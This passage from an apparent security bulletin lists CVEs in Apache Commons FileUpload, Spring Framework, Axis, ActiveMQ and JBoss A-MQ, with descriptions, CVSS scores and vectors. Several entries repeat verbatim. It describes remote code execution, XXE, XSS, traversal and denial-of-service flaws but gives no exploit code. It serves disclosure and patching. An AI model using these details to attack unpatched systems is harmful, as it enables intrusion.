a denial of service, caused by an error in the Apache Commons FileUpload component. By sending file upload requests, an attacker could exploit this vulnerability to cause the server to become unresponsive. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/114336> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2014-0050](<https://vulners.com/cve/CVE-2014-0050>) \n**DESCRIPTION:** Apache Commons FileUpload, as used in Apache Tomcat, Solr, and other products is vulnerable to a denial of service, caused by the improper handling of Content-Type HTTP header for multipart requests by MultipartStream.java. An attacker could exploit this vulnerability using a specially crafted Content-Type header to cause the application to enter into an infinite loop. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/90987> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n**CVEID:** [CVE-2013-0248](<https://vulners.com/cve/CVE-2013-0248>) \n**DESCRIPTION:** Apache Commons FileUpload could allow a local attacker to launch a symlink attack. Temporary files are created insecurely. A local attacker could exploit this vulnerability by creating a symbolic link from a temporary file to various files on the system, which could allow the attacker to overwrite arbitrary files on the system with elevated privileges. \nCVSS Base Score: 3.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/82618> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:M/Au:N/C:N/I:P/A:P)\n\n**CVEID:** [CVE-2016-3092](<https://vulners.com/cve/CVE-2016-3092>) \n**DESCRIPTION:** Apache Tomcat is vulnerable to a denial of service, caused by an error in the Apache Commons FileUpload component. By sending file upload requests, an attacker could exploit this vulnerability to cause the server to become unresponsive. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/114336> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2014-0050](<https://vulners.com/cve/CVE-2014-0050>) \n**DESCRIPTION:** Apache Commons FileUpload, as used in Apache Tomcat, Solr, and other products is vulnerable to a denial of service, caused by the improper handling of Content-Type HTTP header for multipart requests by MultipartStream.java. An attacker could exploit this vulnerability using a specially crafted Content-Type header to cause the application to enter into an infinite loop. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/90987> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n**CVEID:** [CVE-2013-0248](<https://vulners.com/cve/CVE-2013-0248>) \n**DESCRIPTION:** Apache Commons FileUpload could allow a local attacker to launch a symlink attack. Temporary files are created insecurely. A local attacker could exploit this vulnerability by creating a symbolic link from a temporary file to various files on the system, which could allow the attacker to overwrite arbitrary files on the system with elevated privileges. \nCVSS Base Score: 3.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/82618> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:M/Au:N/C:N/I:P/A:P)\n\n**CVEID:** [CVE-2016-3092](<https://vulners.com/cve/CVE-2016-3092>) \n**DESCRIPTION:** Apache Tomcat is vulnerable to a denial of service, caused by an error in the Apache Commons FileUpload component. By sending file upload requests, an attacker could exploit this vulnerability to cause the server to become unresponsive. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/114336> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2014-0050](<https://vulners.com/cve/CVE-2014-0050>) \n**DESCRIPTION:** Apache Commons FileUpload, as used in Apache Tomcat, Solr, and other products is vulnerable to a denial of service, caused by the improper handling of Content-Type HTTP header for multipart requests by MultipartStream.java. An attacker could exploit this vulnerability using a specially crafted Content-Type header to cause the application to enter into an infinite loop. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/90987> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n**CVEID:** [CVE-2013-0248](<https://vulners.com/cve/CVE-2013-0248>) \n**DESCRIPTION:** Apache Commons FileUpload could allow a local attacker to launch a symlink attack. Temporary files are created insecurely. A local attacker could exploit this vulnerability by creating a symbolic link from a temporary file to various files on the system, which could allow the attacker to overwrite arbitrary files on the system with elevated privileges. \nCVSS Base Score: 3.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/82618> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:M/Au:N/C:N/I:P/A:P)\n\n**CVEID:** [CVE-2014-0054](<https://vulners.com/cve/CVE-2014-0054>) \n**DESCRIPTION:** Pivotal Spring Framework could allow a remote attacker to obtain sensitive information, caused by an XML External Entity Injection (XXE) error in Jaxb2RootElementHttpMessageConverter when processing XML data. By sending specially-crafted XML data, an attacker could exploit this vulnerability to read arbitrary files and obtain sensitive information. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/91841> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n**CVEID:** [CVE-2013-7315](<https://vulners.com/cve/CVE-2013-7315>) \n**DESCRIPTION:** Pivotal Spring Framework could allow a remote attacker to obtain sensitive information, caused by an XML External Entity Injection (XXE) error when processing XML data. By sending a specially-crafted request, an attacker could exploit this vulnerability to read arbitrary files and obtain sensitive information. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/95219> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n**CVEID:** [CVE-2013-6429](<https://vulners.com/cve/CVE-2013-6429>) \n**DESCRIPTION:** Spring Framework could allow a remote attacker to obtain sensitive information, caused by an error when parsing XML entities. By persuading a victim to open a specially-crafted XML document containing external entity references, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/90451> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n**CVEID:** [CVE-2013-4152](<https://vulners.com/cve/CVE-2013-4152>) \n**DESCRIPTION:** Pivotal Spring Framework could allow a remote attacker to obtain sensitive information, caused by an XML External Entity Injection (XXE) error when processing XML data. By sending a specially-crafted request, an attacker could exploit this vulnerability to read arbitrary files and obtain sensitive information. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/86589> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n**CVEID:** [CVE-2011-2730](<https://vulners.com/cve/CVE-2011-2730>) \n**DESCRIPTION:** Spring Framework could allow a remote attacker to obtain sensitive information, caused by an error when handling the Expression Language. An attacker could exploit this vulnerability to obtain classpaths and other sensitive information. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/69688> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n**CVEID:** [CVE-2010-1622](<https://vulners.com/cve/CVE-2010-1622>) \n**DESCRIPTION:** Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by an error in the mechanism to use client provided data to update the properties of an object. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/59573> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n**CVEID:** [CVE-2018-1272](<https://vulners.com/cve/CVE-2018-1272>) \n**DESCRIPTION:** Pivotal Spring Framework could allow a remote authenticated attacker to gain elevated privileges on the system, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to gain elevated privileges. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/141286> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2018-1271](<https://vulners.com/cve/CVE-2018-1271>) \n**DESCRIPTION:** Pivotal Spring Framework could allow a remote attacker to traverse directories on the system, caused by improper validation of user request. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to configure Spring MVC to serve static resources. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/141285> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [CVE-2018-1270](<https://vulners.com/cve/CVE-2018-1270>) \n**DESCRIPTION:** Pivotal Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the exposure of STOMP over WebSocket endpoints with a STOMP broker through the spring-messaging module. By sending a specially-crafted message, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/141284> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2016-9878](<https://vulners.com/cve/CVE-2016-9878>) \n**DESCRIPTION:** Pivotal Spring Framework could allow a remote attacker to traverse directories on the system, caused by the failure to sanitize paths provided to ResourceServlet. An attacker could send a specially-crafted URL request containing directory traversal sequences to view arbitrary files on the system. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/120241> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n**CVEID:** [CVE-2014-1904](<https://vulners.com/cve/CVE-2014-1904>) \n**DESCRIPTION:** Spring MVC is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the FormTag.java script. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim''s Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim''s cookie-based authentication credentials. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/91890> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [CVE-2014-3596](<https://vulners.com/cve/CVE-2014-3596>) \n**DESCRIPTION:** Apache Axis and Axis2 could allow a remote attacker to conduct spoofing attacks, caused by and incomplete fix related to the failure to verify that the server hostname matches a domain name in the subject''s Common Name (CN) field of the X.509 certificate. By persuading a victim to visit a Web site containing a specially-crafted certificate, an attacker could exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/95377> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [CVE-2012-5784](<https://vulners.com/cve/CVE-2012-5784>) \n**DESCRIPTION:** Apache Axis 1.4, as used in multiple products, could allow a remote attacker to conduct spoofing attacks, caused by the failure to verify that the server hostname matches a domain name in the subject''s Common Name (CN) field of the X.509 certificate. An attacker could exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server and launch further attacks against a vulnerable target. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/79829> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [CVE-2013-3060](<https://vulners.com/cve/CVE-2013-3060>) \n**DESCRIPTION:** Apache ActiveMQ is vulnerable to a denial of service, caused by the failure to require authentication, by the Web console. By sending specially-crafted HTTP requests, an attacker could exploit this vulnerability to obtain sensitive information or cause a denial of service. \nCVSS Base Score: 6.4 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/83719> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:P)\n\n**CVEID:** [CVE-2013-1880](<https://vulners.com/cve/CVE-2013-1880>) \n**DESCRIPTION:** Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the demo/portfolioPublish script. A remote attacker could exploit this vulnerability using the refresh parameter in a specially-crafted URL to execute script in a victim''s Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim''s cookie-based authentication credentials. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/103075> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [CVE-2013-1879](<https://vulners.com/cve/CVE-2013-1879>) \n**DESCRIPTION:** Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when handling cron jobs. A remote attacker could exploit this vulnerability using specific parameters to inject malicious script into a Web page which would be executed in a victim''s Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim''s cookie-based authentication credentials. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/85586> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [CVE-2012-6551](<https://vulners.com/cve/CVE-2012-6551>) \n**DESCRIPTION:** Apache ActiveMQ is vulnerable to a denial of service, caused by the enablement of a sample web application by the default configuration. By sending specially-crafted HTTP requests, an attacker could exploit this vulnerability to consume broker resources and cause a denial of service. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/83718> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n**CVEID:** [CVE-2012-6092](<https://vulners.com/cve/CVE-2012-6092>) \n**DESCRIPTION:** Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by multiple vectors. A remote attacker could exploit this vulnerability using various parameters in a specially-crafted URL to execute script in a victim''s Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim''s cookie-based authentication credentials. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/83720> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [CVE-2012-5784](<https://vulners.com/cve/CVE-2012-5784>) \n**DESCRIPTION:** Apache Axis 1.4, as used in multiple products, could allow a remote attacker to conduct spoofing attacks, caused by the failure to verify that the server hostname matches a domain name in the subject''s Common Name (CN) field of the X.509 certificate. An attacker could exploit this vulnerability using man-in-the-middle techniques to spoof an SSL server and launch further attacks against a vulnerable target. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/79829> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [CVE-2011-4905](<https://vulners.com/cve/CVE-2011-4905>) \n**DESCRIPTION:** Apache ActiveMQ is vulnerable to a denial of service, caused by an error in the failover mechanism when handling an openwire connection request. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause the broker service to crash. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/71620> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n**CVEID:** [CVE-2015-1830](<https://vulners.com/cve/CVE-2015-1830>) \n**DESCRIPTION:** Apache ActiveMQ could allow a remote attacker to traverse directories on the system, caused by an error in the fileserver upload/download functionality. By placing a jsp file in the admin console, an attacker could exploit this vulnerability to execute arbitrary shell commands on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/105644> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2014-8110](<https://vulners.com/cve/CVE-2014-8110>) \n**DESCRIPTION:** Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim''s Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim''s cookie-based authentication credentials. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/100724> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [CVE-2014-3612](<https://vulners.com/cve/CVE-2014-3612>) \n**DESCRIPTION:** Apache ActiveMQ could allow a remote authenticated attacker to bypass security restrictions, caused by an error in the LDAPLoginModule implementation. By sending an empty password, an attacker could exploit this vulnerability to bypass the authentication mechanism of an application using LDAPLoginModule and assume the role of another user. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/100723> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [CVE-2014-3600](<https://vulners.com/cve/CVE-2014-3600>) \n**DESCRIPTION:** Apache ActiveMQ could allow a remote attacker to obtain sensitive information, caused by an XML External Entity Injection (XXE) error when processing XML data. By sending specially-crafted XML data to specify an XPath based selector, an attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/100722> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n**CVEID:** [CVE-2014-3576](<https://vulners.com/cve/CVE-2014-3576>) \n**DESCRIPTION:** Apache ActiveMQ is vulnerable to a denial of service, caused by an error in the processControlCommand function in broker/TransportConnection.java. A remote attacker could use the shutdown command to shutdown the service. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107290> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [CVE-2015-6524](<https://vulners.com/cve/CVE-2015-6524>) \n**DESCRIPTION:** Apache ActiveMQ is vulnerable to a brute force attack, caused by an error in the LDAPLoginModule implementation. An attacker could exploit this vulnerability using the wildcard in usernames to obtain user credentials. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/106187> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n**CVEID:** [CVE-2015-5254](<https://vulners.com/cve/CVE-2015-5254>) \n**DESCRIPTION:** Apache ActiveMQ could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the classes that can be serialized in the broker. An attacker could exploit this vulnerability using a specially crafted serialized Java Message Service (JMS) ObjectMessage object to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/109632> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2015-5184](<https://vulners.com/cve/CVE-2015-5184>) \n**DESCRIPTION:** Red Hat JBoss A-MQ could allow a remote attacker to obtain sensitive information, caused by the Access-Control-Allow-Origin header permits unrestricted sharing in Hawtio console. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/132635> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n**CVEID:** [CVE-2015-5183](<https://vulners.com/cve/CVE-2015-5183>) \n**DESCRIPTION:** Red Hat JBoss A-MQ could allow a remote attacker to obtain sensitive information, caused by no HTTPOnly or Secure attributes on cookies configured in Hawtio console. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to obtain an authenticated user''s SessionID. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/132634> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n**CVEID:** [CVE-2015-5182](<https://vulners.com/cve/CVE-2015-5182>) \n**DESCRIPTION:** Red Hat JBoss A-MQ is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input by the jolokia API. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorized actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/132633> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2015-6524](<https://vulners.com/cve/CVE-2015-6524>) \n**DESCRIPTION:** Apache ActiveMQ is vulnerable to a brute force attack, caused by an error in the LDAPLoginModule implementation. An attacker could exploit this vulnerability using the wildcard in usernames to obtain user credentials. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/106187> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n**CVEID:** [CVE-2015-5254](<https://vulners.com/cve/CVE-2015-5254>) \n**DESCRIPTION:** Apache ActiveMQ could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the classes that can be serialized in the broker. An attacker could exploit this vulnerability using a specially crafted serialized Java Message Service (JMS) ObjectMessage object to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/109632> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2015-5184](<https://vulners.com/cve/CVE-2015-5184>) \n**DESCRIPTION:** Red Hat JBoss A-MQ could allow a remote attacker to obtain sensitive information, caused by the Access-Control-Allow-Origin header permits unrestricted sharing in Hawtio console. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/132635> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n**CVEID:** [CVE-2015-5183](<https://vulners.com/cve/CVE-2015-5183>) \n**DESCRIPTION:** Red Hat JBoss A-MQ could allow a remote attacker to obtain sensitive information, caused by no HTTPOnly or Secure attributes on cookies configured in Hawtio console. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to obtain an authenticated user''s SessionID. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/132634> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n**CVEID:** [CVE-2015-5182](<https://vulners.com/cve/CVE-2015-5182>) \n**DESCRIPTION:** Red Hat JBoss A-MQ is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input by the jolokia API. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorized actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/132633> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2016-0782](<https://vulners.com/cve/CVE-2016-0782>) \n**DESCRIPTION:** Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the web based administration console. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim''s Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim''s cookie-based authentication credentials. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/111420> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n**CVEID:** [CVE-2016-0734](<https://vulners.com/cve/CVE-2016-0734>) \n**DESCRIPTION:** Apache ActiveMQ could allow a remote attacker to hijack the clicking action of the victim, caused by the failure to set the X-Frame-Options header in HTTP responses by the Administrative Web console. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim''s click actions. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/111421> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)\n\n**CVEID:** [CVE-2016-3088](<https://vulners.com/cve/CVE-2016-3088>) \n**DESCRIPTION:** Apache ActiveMQ could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Fileserver web application. By sending a specially crafted HTTP PUT request and an HTTP MOVE request, an attacker could exploit this vulnerability to create an arbitrary file and execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/113414> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2016-6810](<https://vulners.com/cve/CVE-2016-6810>) \n**DESCRIPTION:** Apache ActiveMQ is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability in a specially-crafted URL to execute script in a victim''s Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim''s cookie-based authentication credentials. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119699> for 